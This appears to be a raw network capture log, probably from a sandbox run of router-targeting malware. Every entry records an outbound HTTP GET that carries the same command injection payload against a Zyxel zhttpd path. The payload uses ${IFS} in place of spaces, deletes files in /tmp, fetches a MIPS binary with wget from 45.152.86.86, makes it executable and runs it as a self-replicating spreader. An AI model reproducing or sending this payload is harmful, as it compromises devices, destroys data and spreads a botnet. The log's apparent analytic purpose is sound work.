                                        Mar 31, 2024 09:21:20.909734011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4732192.168.2.2357306109.21.39.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909774065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4733192.168.2.234751050.182.231.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909815073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4734192.168.2.2342160115.29.185.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909862995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4735192.168.2.233496835.163.112.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909887075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4736192.168.2.235177244.31.208.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909929991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4737192.168.2.23355149.30.75.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909974098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4738192.168.2.234224489.10.54.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910021067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4739192.168.2.2336624107.254.13.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910068989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4740192.168.2.2350378149.182.188.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910115004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4741192.168.2.2349512173.31.83.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910156012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4742192.168.2.235061043.105.87.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910195112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4743192.168.2.2343174179.182.20.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910239935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4744192.168.2.2357644173.111.28.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910274029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4745192.168.2.2354146106.101.34.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910312891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4746192.168.2.234417024.165.238.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910366058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4747192.168.2.2348498137.81.64.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910408974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4748192.168.2.2334338116.210.112.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910446882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4749192.168.2.234883846.104.215.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910495996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4750192.168.2.2337030192.197.189.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910531998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4751192.168.2.2355940115.204.35.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910588980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4752192.168.2.233563618.105.43.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910628080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4753192.168.2.234289025.102.230.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910676956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4754192.168.2.2358022116.133.222.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910718918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4755192.168.2.2359540152.85.103.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910759926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4756192.168.2.2338934187.234.75.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910818100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4757192.168.2.234332638.189.164.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910856962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4758192.168.2.2335038155.80.249.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910897017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4759192.168.2.2352558198.255.65.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910947084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4760192.168.2.2354400211.68.22.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.910990953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4761192.168.2.2354904146.12.93.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:21.910487890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4762192.168.2.2356890151.44.18.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:21.910526037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4763192.168.2.235650093.101.159.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:21.910589933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4764192.168.2.2350022107.22.70.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:21.910648108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4765192.168.2.2340862158.14.225.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:21.910686970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4766192.168.2.2343552173.32.200.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:21.910727024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4767192.168.2.2340098146.33.112.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:21.910767078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4768192.168.2.234221448.175.161.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:21.910795927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4769192.168.2.2342316164.46.252.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:21.910842896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4770192.168.2.235080677.147.251.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:21.910898924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4771192.168.2.234192477.38.176.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:21.910933018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4772192.168.2.2335762218.212.24.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:22.919759989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4773192.168.2.2351182164.57.4.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:22.919847965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4774192.168.2.2356076135.118.153.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.931591034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4775192.168.2.233282284.151.145.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.931647062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4776192.168.2.235714231.155.164.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.931675911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4777192.168.2.2360274178.65.151.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.931744099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4778192.168.2.2345536178.15.255.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.931804895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4779192.168.2.2339292110.100.226.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.931833982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4780192.168.2.2354394200.148.4.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.931874037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4781192.168.2.235357081.151.180.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.931941986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4782192.168.2.2336644201.47.5.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932025909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4783192.168.2.2358620162.216.225.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932056904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4784192.168.2.2358046179.140.24.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932089090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4785192.168.2.2346270201.188.202.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932137012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4786192.168.2.2351448110.49.213.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932192087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4787192.168.2.233692270.254.116.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932264090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4788192.168.2.2334296201.204.133.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932307959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4789192.168.2.2347856203.252.16.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932360888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4790192.168.2.2354378126.165.215.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932408094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4791192.168.2.235016679.40.43.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932442904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4792192.168.2.2336118145.16.219.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932503939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4793192.168.2.2339526216.140.143.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932563066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4794192.168.2.2358478203.161.128.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932600021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4795192.168.2.23475184.239.65.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932647943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4796192.168.2.2352502100.193.87.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932702065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4797192.168.2.234925458.246.116.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932735920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4798192.168.2.235113693.195.134.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932785988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4799192.168.2.233430052.168.53.228443
                                        TimestampBytes transferredDirectionData
